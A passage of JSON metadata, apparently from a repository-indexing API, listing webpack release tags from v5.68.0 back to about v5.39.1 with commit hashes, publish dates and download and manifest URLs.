/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2